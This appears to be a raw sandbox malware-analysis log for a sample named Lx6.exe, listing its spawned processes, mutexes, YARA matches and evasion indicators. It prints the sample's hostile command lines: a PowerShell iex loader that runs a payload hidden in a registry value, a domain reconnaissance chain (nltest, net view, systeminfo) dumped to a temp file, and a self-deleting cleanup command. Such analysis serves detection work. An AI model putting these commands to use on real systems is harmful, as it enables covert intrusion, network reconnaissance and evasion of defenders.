Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Users\user\Desktop\Lx6.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain |more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: C:\Users\user\Desktop\Lx6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akfsyqoz.ont.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076FD17 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0076FD17
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2692:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Mutant created: \Sessions\1\BaseNamedObjects\{B0580A46-4F94-62F5-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_01
Source: C:\Users\user\Desktop\Lx6.exe Mutant created: \Sessions\1\BaseNamedObjects\{D81B4F77-576D-CA2A-A18C-7B9E6580DFB2}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_01
Source: C:\Windows\System32\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{D44985C1-232B-2616-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Mutant created: \Sessions\1\BaseNamedObjects\{78F747AD-7754-6AA7-C12C-9B3E8520FF52}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{443CA95C-D31A-1662-7DB8-B7AA016CDB7E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Mutant created: \Sessions\1\BaseNamedObjects\{E47BD961-F315-B6E2-9D58-D74A210CFB1E}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{48DADAAC-07B9-BA22-D1FC-2B8E95F08FA2}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Mutant created: \Sessions\1\BaseNamedObjects\{6CC2E80A-DBDA-7E52-C560-3F92C994E3E6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01
Source: C:\Users\user\Desktop\Lx6.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Lx6.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Lx6.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075B106 push ecx; mov dword ptr [esp], 00000002h 0_2_0075B107
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00772AB3 push ecx; ret 0_2_00772AC3
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00772580 push ecx; ret 0_2_00772589
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00769772 push ss; ret 0_2_00769773
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03042AB3 push ecx; ret 35_2_03042AC3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302B106 push ecx; mov dword ptr [esp], 00000002h 35_2_0302B107
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03039772 push ss; ret 35_2_03039773
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03042580 push ecx; ret 35_2_03042589
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\msihj3zd.dll

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Users\user\Desktop\Lx6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\Lx6.exe TID: 4728 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe TID: 4728 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Lx6.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9749 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5459
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Users\user\Desktop\Lx6.exe API coverage: 8.0 %
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 3.7 %
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msihj3zd.dll Jump to dropped file
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
